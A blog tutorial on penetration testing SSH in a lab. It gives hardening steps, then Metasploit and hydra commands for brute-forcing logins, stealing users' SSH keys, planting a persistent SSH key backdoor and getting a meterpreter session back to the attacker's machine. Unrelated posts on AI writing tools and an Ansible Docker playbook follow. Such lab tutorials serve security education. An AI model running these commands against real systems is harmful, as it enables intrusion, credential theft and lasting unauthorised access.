SSH Penetration Testing (Port 22)
Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work, one is required to keep their port open but at the same time, they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open. In this post, we will discuss penetration testing of SSH which is also known as Secure Shell.
Introduction to SSH
The SSH protocol also stated as Secure Shell is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, as it protects the connections and communications\ with security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).
SSH Installation
It is very easy to install and configure the ssh service, we can directly install the ssh service by using the OpenSSH-server package from the ubuntu repo. To install any service you must have a root privilege account and then follow the given below command.
apt install openssh-server
when you will execute the above command it will extract the package the install the default configuration on the host machine. you can check the open port with the help of netstat command on the host machine
SSH Port Scanning
If you don’t have direct access to the host machine, use Nmap to remotely identify the port state which is considered to be the initial step of the penetration test. Here we’re going to use Kali Linux to perform penetration testing.
So, to identify an open port on a remote network, we will use a version scan of the map that will not only identify an open port but will also perform a banner grabbing that shows the installed version of the service.
nmap -sV -p22 192.168.1.103
Methods to Connect SSH
Terminal Command (Linux)
Now execute the following command to access the ssh shell of the remote machine as an authorized user. Username: ignite
Password: 123
ssh [email protected]
Putty (Windows)
Step 1: Install putty.exe and run it, then enter the HOST IP address <192.168.1.103> and port <22>, also choose to connect type as SSH.
Step2: To establish a connection between the client and the server, a putty session will be generated that requires a login credential.
Username: ignite
Password: 123
Port Redirection
By default, ssh listen on port 22 which means if the attacker identifies port 22 is open then he can try attacks on port 22 in order to connect with the host machine. Therefore, a system admin chooses Port redirection or Port mapping by changing its default port to others in order to receive the connection request from the authorized network.
Follow the below steps for port redirection:
Step1: Edit the sshd_config from inside the /etc/sshd using the editor
nano /etc/ssh/sshd_config
Step2: Change port 22 into 2222 and save the file.
Step3: Then restart ssh
Port Redirection Testing
Thus, when we have run the scan on port 22, it has shown port state CLOSE for ssh whereas port 2222 OPEN for ssh which can be seen the given image.
Establish SSH connection using RSA key
Strong passwords don’t seem to be decent to secure the server because a brute force attack can crack them. That’s why you need an additional security method to secure the SSH server.
SSH key pairs is another necessary feature to authenticate clients to the server. It consists of a long string of characters: a public and a private key. You can place the public key on the server and the private key on the client machine and unlock the server by connecting the private key of the client machine. Once the keys match up, the system permits you to automatically establish an SSH session without the need to type in a password.
Ssh-keygen is a tool for creating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and for authenticating hosts.
Thus, we will follow the steps for generating a key pair for authenticated connection.
Step1: Run the given command to generate an ssh key pair (id_rsa and id_rsa.pub) on the host machine Ubuntu.
Step 2: Same should be done on the client machine which is authorized to establish the connection with the host machine (ubuntu).
Step 3: Once the ssh key pair (id_rsa and id_rsa.pub) get generated then rename the id_rsa.pub into authorized_keys as shown in the given image.
Step3: Once the ssh key pair (id_rsa and id_rsa.pub) get generated then rename the id_rsa.pub into authorized_keys as show in the given image.
ssh-keygen cd .ssh ls cat id_rsa.pub > authorized_keys
Step4: Share the authorized_keys with the host machine by copying it into the .ssh directory.
Step5: Edit the sshd_config from inside the /etc/sshd using the editor
nano /etc/ssh/sshd_config
Step6: Enable the “passwordauthentication no” comment
As a result of only the authorized machine which rsa key can establish a connection with the host machine without using password.
Now if you need to connect to the ssh server using your password username, the server will drop your connection request because it will authenticate the request that has authorized key.
Step7: Copy the id_rsa key from Kali Linux to the windows machine, to established connection using authorized keys on the windows machine,
Step8: Install puttygen.exe
Step 9: Run puttygen.exe and load the id_rsa and “save as key” named as Key
Step10: Use putty.exe to connect with the host machine by entering hostname 192.168.1.103 and port 22.
Step11: Navigate to SSH >auth and browse the key private key that you have saved as mention in step 9.
This will establish an ssh connection between windows client and server without using a password.
Exploit SSH with Metasploit
SSH Key Persistence- Post Exploitation
Consider a situation, that by compromising the host machine you have obtained a meterpreter session and want to leave a permanent backdoor that will provide a reverse connection for next time.
This can be achieved with the help of the Metasploit module named “SSH Key Persistence-a post exploit” when port 22 is running on the host machine.
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
use post/linux/manage/sshkey_persistence msf post(sshkey_persistence) > set session 1 msf post(sshkey_persistence) >exploit
As can be seen in the image given, it added authorized keys to /home / ignite/.ssh and stored a private key within /root/.msf4/loot
As we ensure this by connecting the host machine via port 22 using a private key generated above. Here I have renamed the private as “key” and gave permission 600.
chmod 600 key ssh -i key [email protected]
Bravo!! It works without any congestion and in this way, we can use ssh key as persistence backdoor.
Stealing the SSH key
Consider a situation, that by compromising the host machine you have obtained a meterpreter session and port 22 is open for ssh and you want to steal SSH public key and authorized key. This can be done with the help Metasploit module named “Multi Gather OpenSSH PKI Credentials Collection -a post exploit” as discussed below.
This module will collect the contents of all users .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.
use post/multi/gather/ssh_creds msf post(ssh_creds) >set session 1 msf post(ssh_creds) >exploit
From given below image you can see we have got all authorized keys store in /home/ignite/.ssh directory in our local machine at /root/.msf4/loot and now use those keys for login into an SSH server.
This can be done manually by downloading keys directly from inside /home/ignite/.ssh as shown in the below image.
As we ensure this by connecting the host machine via port 22 using private key downloaded above. Let’s change the permission for the rsa key and to do this follow the step given below.
chmod 600 key ssh -i key [email protected]
It works without any congestion and in this way, we can use ssh key as persistence backdoor.
SSH login using pubkey
Considering you have id_rsa key of the host machine and want to obtain meterpreter session via Metasploit and this can be achieved with the help of the following module.
This module will test ssh logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.
use auxillary/scanner/ssh /ssh_login_pubkey auxiliary (scanner/ssh /ssh_login_pubkey)>set rhosts 192.168.1.103 auxiliary (scanner/ssh /ssh_login_pubkey)>set username ignite auxiliary (scanner/ssh /ssh_login_pubkey)>set key_path /root/.ssh/id_rsa auxiliary (scanner/ssh /ssh_login_pubkey)>exploit
This will give a command session which can be further updated into the meterpreter session by executing the following command.
sessions -u 1
SSH Password cracking
We can test a brute force attack on ssh for guessing the password or to test threshold policy while performing penetration testing on SSH. It requires a dictionary for username list and password list, here we have username dictionary “user.txt” and password list named “pass.txt” to perform the brute force attack with the help of hydra
hydra -L user.txt -P pass.txt 192.168.1.103 ssh
As a result, you can observe that the host machine has no defense against brute force attacks, and we were able to obtain ssh credentials.
To protect your service against brute force attacks you can use fail2ban which is an IPS. Read more from here to set up fail2ban IPS in the network.
If you will observe the given below image, then it can see here that this time the connection request drops by the host machine when we try to launch a brute force attack.
SSH Public Key Login Scanner
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory. Only a single passphrase is supported, however, so it must either be shared between subject keys or only belong to a single one.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.1.103 msf auxiliary(ssh_login_pubkey) > set user_file /root/user.txt msf auxiliary(ssh_login_pubkey) > set key_path /root/.ssh/id_rsa.pub msf auxiliary(ssh_login_pubkey) > run
As a result, you can observe that user “ignite” is authorized to use the public to connect with ssh of the host machine.
SSH User Code Execution
This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. Thus we gave host IP along with username and password, if everything goes in right then we get meterpreter session on our listening machine.
msf > use exploit/multi/ssh/sshexec msf exploit(sshexec) >set rhosts 192.168.1.103 msf exploit(sshexec) >set username ignite msf exploit(sshexec) >set password 123 msf exploit(sshexec) >set srvhost 192.168.1.107 msf exploit(sshexec) >exploit
as a result, you can observe that we have meterpreter session of the host machine.
Conclusion: In this post, we try to discuss the possible way to secure SSH and perform penetration testing against such a scenario.
Related Post
.png)
Feb 13, 2023
Top Five Free Ai Content Generator: Free Ai Content Generator 2023
The soul of a website is called the content. So it is easy to understand that the website has no value without content. And writing content takes a lot of research. There is a lot to think about. Whether it is WordPress or Blogspot, everyone knows how hard it is to write content. But what if these contents become automatically generated? Yes, you are right, today I will talk about something like this in this article. Today I will share with you five free AI content generators that are completely free.What Is Ai Generated Content?Before knowing what AI content is, we need to know what AI is. AI is Artificial Intelligence. Many people have more or fewer ideas about artificial intelligence. But for those who don't know. Artificial intelligence is when a machine such as a computer can make decisions by itself, it is called artificial intelligence. Now let me tell you what AI content is. AI content means you just give a few hints and it will automatically write the entire content within seconds. This content is called AI-generated content.Is Ai Generated Content Unique?Yes, Of course. Because these AI-generated contents are generated by different AI content generators completely by themselves. So it will give you completely unique content. AI content generators will write the content based on the topic which are you give.How Does Ai Content Generator Work?The way Ai content generators work is that You first give the generator little hints about the topic you want to write about like it might ask you for a headline. Give some keywords in the topic and it will generate unique content for you in a few seconds.Best Free Ai Content Generator ToolsThere are many AI generator tools. But today I will talk about 5 content generators that are better than other content generators and easy to use. And these content generators will give you much better content than any other content generator.Simplified- Content Generator ToolSimplified is one of the best content generator tools. There are a lot of free tools you'll find here. You can generate up to five thousand words by Simplified which is huge. And also there are a lot of free features available in Simplified.1. Ryter: An All In One Content WriterRyter is a next-level content generator tool Because it can understand the language model deeply. For this reason, it can generate the best content. You can use all the features for free but you can only generate 5000 words per month.2. Copy Ai Free Ai Content GeneratorCopy AI is the best content generator of any other tool. Because it is built on the world's best ai technology. So it can generate more creative and best content very fast. You can generate 100 pieces of content in the first months by Copy Ai Free Content Generator.3. Content Bot Advance AI WriterContent Bot Advance AI Writer tool can generate content from any short hints or keywords. And it's a very powerful content generator tool. You can generate 500 pieces of content per month and one thousand five hundred long-form editor words every month. But it's a little bit hard to use.4. Smart Copy By UnbounceSmart Copy is one of the advanced level AI writing tools. You can use it to generate your content You can use all features fully free but you can generate only 5 articles per day.So here is the top five best AI content generator tool you can use a lot of free features without purchasing it but there is a few limitations. So try to use free features.
Read More
Feb 6, 2023
How to Use Ansible to Install and Set Up Docker on Ubuntu 22.04
IntroductionServer automation now plays an essential role in systems administration, due to the disposable nature of modern application environments. Configuration management tools such as Ansible are typically used to streamline the process of automating server setup by establishing standard procedures for new servers while also reducing human error associated with manual setups.Ansible offers a simple architecture that doesn’t require special software to be installed on nodes. It also provides a robust set of features and built-in modules which facilitate writing automation scripts.This guide explains how to use Ansible to automate the steps contained in our guide on How To Install and Use Docker on Ubuntu 22.04. Docker is an application that simplifies the process of managing containers, resource-isolated processes that behave in a similar way to virtual machines, but are more portable, more resource-friendly, and depend more heavily on the host operating system.PrerequisitesIn order to execute the automated setup provided by the playbook in this guide, you’ll need:One Ansible control node: an Ubuntu 22.04 machine with Ansible installed and configured to connect to your Ansible hosts using SSH keys. Make sure the control node has a regular user with sudo permissions and a firewall enabled, as explained in our Initial Server Setup guide. To set up Ansible, please follow our guide on How to Install and Configure Ansible on Ubuntu 22.04.One or more Ansible Hosts: one or more remote Ubuntu 22.04 servers previously set up following the guide on How to Use Ansible to Automate Initial Server Setup on Ubuntu 22.04.Before proceeding, you first need to make sure your Ansible control node is able to connect and execute commands on your Ansible host(s). For a connection test, check Step 3 of How to Install and Configure Ansible on Ubuntu 22.04.What Does this Playbook Do?This Ansible playbook provides an alternative to manually running through the procedure outlined in our guide on How To Install and Use Docker on Ubuntu 22.04. Set up your playbook once, and use it for every installation after.Running this playbook will perform the following actions on your Ansible hosts:Install aptitude, which is preferred by Ansible as an alternative to the apt package manager.Install the required system packages.Install the Docker GPG APT key.Add the official Docker repository to the apt sources.Install Docker.Install the Python Docker module via pip.Pull the default image specified by default_container_image from Docker Hub.Create the number of containers defined by the container_count variable, each using the image defined by default_container_image, and execute the command defined in default_container_command in each new container.Once the playbook has finished running, you will have a number of containers created based on the options you defined within your configuration variables.To begin, log into a sudo enabled user on your Ansible control node server.Step 1 — Preparing your PlaybookThe playbook.yml file is where all your tasks are defined. A task is the smallest unit of action you can automate using an Ansible playbook. But first, create your playbook file using your preferred text editor:nano playbook.yml CopyThis will open an empty YAML file. Before diving into adding tasks to your playbook, start by adding the following:playbook.yml--- - hosts: all become: true vars: container_count: 4 default_container_name: docker default_container_image: ubuntu default_container_command: sleep 1 CopyAlmost every playbook you come across will begin with declarations similar to this. hosts declares which servers the Ansible control node will target with this playbook. become states whether all commands will be done with escalated root privileges.vars allows you to store data in variables. If you decide to change these in the future, you will only have to edit these single lines in your file. Here’s a brief explanation of each variable:container_count: The number of containers to create.default_container_name: Default container name.default_container_image: Default Docker image to be used when creating containers.default_container_command: Default command to run on new containers.Note: If you want to see the playbook file in its final finished state, jump to Step 5. YAML files can be particular with their indentation structure, so you may want to double-check your playbook once you’ve added all your tasks.Step 2 — Adding Packages Installation Tasks to your PlaybookBy default, tasks are executed synchronously by Ansible in order from top to bottom in your playbook. This means task ordering is important, and you can safely assume one task will finish executing before the next task begins.All tasks in this playbook can stand alone and be re-used in your other playbooks.Add your first tasks of installing aptitude, a tool for interfacing with the Linux package manager, and installing the required system packages. Ansible will ensure these packages are always installed on your server:playbook.yml tasks: - name: Install aptitude apt: name: aptitude state: latest update_cache: true - name: Install required system packages apt: pkg: - apt-transport-https - ca-certificates - curl - software-properties-common - python3-pip - virtualenv - python3-setuptools state: latest update_cache: true CopyHere, you’re using the apt Ansible built-in module to direct Ansible to install your packages. Modules in Ansible are shortcuts to execute operations that you would otherwise have to run as raw bash commands. Ansible safely falls back onto apt for installing packages if aptitude is not available, but Ansible has historically preferred aptitude.You can add or remove packages to your liking. This will ensure all packages are not only present, but on the latest version, and do after an update with apt is called.Step 3 — Adding Docker Installation Tasks to your PlaybookYour task will install the latest version of Docker from the official repository. The Docker GPG key is added to verify the download, the official repository is added as a new package source, and Docker will be installed. Additionally, the Docker module for Python will be installed as well:playbook.yml - name: Add Docker GPG apt Key apt_key: url: https://download.docker.com/linux/ubuntu/gpg state: present - name: Add Docker Repository apt_repository: repo: deb https://download.docker.com/linux/ubuntu jammy stable state: present - name: Update apt and install docker-ce apt: name: docker-ce state: latest update_cache: true - name: Install Docker Module for Python pip: name: docker CopyYou’ll see that apt_key and apt_repository built-in Ansible modules are first pointed at the correct URLs, then tasked to ensure they are present. This allows installation of the latest version of Docker, along with using pip to install of the module for Python.Step 4 — Adding Docker Image and Container Tasks to your PlaybookThe actual creation of your Docker containers starts here with the pulling of your desired Docker image. By default, these images come from the official Docker Hub. Using this image, containers will be created according to the specifications laid out by the variables declared at the top of your playbook:playbook.yml - name: Pull default Docker image community.docker.docker_image: name: "{{ default_container_image }}" source: pull - name: Create default containers community.docker.docker_container: name: "{{ default_container_name }}{{ item }}" image: "{{ default_container_image }}" command: "{{ default_container_command }}" state: present with_sequence: count={{ container_count }} Copydocker_image is used to pull the Docker image you want to use as the base for your containers. docker_container allows you to specify the specifics of the containers you create, along with the command you want to pass them.with_sequence is the Ansible way of creating a loop, and in this case, it will loop the creation of your containers according to the count you specified. This is a basic count loop, so the item variable here provides a number representing the current loop iteration. This number is used here to name your containers.Step 5 — Reviewing your Complete PlaybookYour playbook should look roughly like the following, with minor differences depending on your customizations:playbook.yml--- - hosts: all become: true vars: container_count: 4 default_container_name: docker default_container_image: ubuntu default_container_command: sleep 1d tasks: - name: Install aptitude apt: name: aptitude state: latest update_cache: true - name: Install required system packages apt: pkg: - apt-transport-https - ca-certificates - curl - software-properties-common - python3-pip - virtualenv - python3-setuptools state: latest update_cache: true - name: Add Docker GPG apt Key apt_key: url: https://download.docker.com/linux/ubuntu/gpg state: present - name: Add Docker Repository apt_repository: repo: deb https://download.docker.com/linux/ubuntu jammy stable state: present - name: Update apt and install docker-ce apt: name: docker-ce state: latest update_cache: true - name: Install Docker Module for Python pip: name: docker - name: Pull default Docker image community.docker.docker_image: name: "{{ default_container_image }}" source: pull - name: Create default containers community.docker.docker_container: name: "{{ default_container_name }}{{ item }}" image: "{{ default_container_image }}" command: "{{ default_container_command }}" state: present with_sequence: count={{ container_count }} CopyFeel free to modify this playbook to best suit your individual needs within your own workflow. For example, you could use the docker_image module to push images to Docker Hub or the docker_container module to set up container networks.Note: This is a gentle reminder to be mindful of your indentations. If you run into an error, this is very likely the culprit. YAML suggests using 2 spaces as an indent, as was done in this example.Once you’re satisfied with your playbook, you can exit your text editor and save.Step 6 — Running your PlaybookYou’re now ready to run this playbook on one or more servers. Most playbooks are configured to be executed on every server in your inventory by default, but you’ll specify your server this time.To execute the playbook only on server1, connecting as sammy, you can use the following command:ansible-playbook playbook.yml -l server1 -u sammy CopyThe -l flag specifies your server and the -u flag specifies which user to log into on the remote server. You will get output similar to this:Output. . . changed: [server1] TASK [Create default containers] ***************************************************************************************************************** changed: [server1] => (item=1) changed: [server1] => (item=2) changed: [server1] => (item=3) changed: [server1] => (item=4) PLAY RECAP *************************************************************************************************************************************** server1 : ok=9 changed=8 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0 Note: For more information on how to run Ansible playbooks, check our Ansible Cheat Sheet Guide.This indicates your server setup is complete! Your output doesn’t have to be exactly the same, but it is important that you have zero failures.When the playbook is finished running, log in via SSH to the server provisioned by Ansible to check if the containers were successfully created.Log in to the remote server with:ssh sammy@your_remote_server_ip CopyAnd list your Docker containers on the remote server:sudo docker ps -a CopyYou should see output similar to this:OutputCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES a3fe9bfb89cf ubuntu "sleep 1d" 5 minutes ago Created docker4 8799c16cde1e ubuntu "sleep 1d" 5 minutes ago Created docker3 ad0c2123b183 ubuntu "sleep 1d" 5 minutes ago Created docker2 b9350916ffd8 ubuntu "sleep 1d" 5 minutes ago Created docker1 This means the containers defined in the playbook were created successfully. Since this was the last task in the playbook, it also confirms that the playbook was fully executed on this server.ConclusionAutomating your infrastructure setup can not only save you time, but it also helps to ensure that your servers will follow a standard configuration that can be customized to your needs. With the distributed nature of modern applications and the need for consistency between different staging environments, automation like this has become a central component in many teams’ development processes.In this guide, you demonstrated how to use Ansible to automate the process of installing and setting up Docker on a remote server. Because each individual typically has different needs when working with containers, we encourage you to check out the official Ansible documentation for more information and use cases of the docker_container Ansible module.If you’d like to include other tasks in this playbook to further customize your initial server setup, please refer to our introductory Ansible guide Configuration Management 101: Writing Ansible Playbooks.
Read More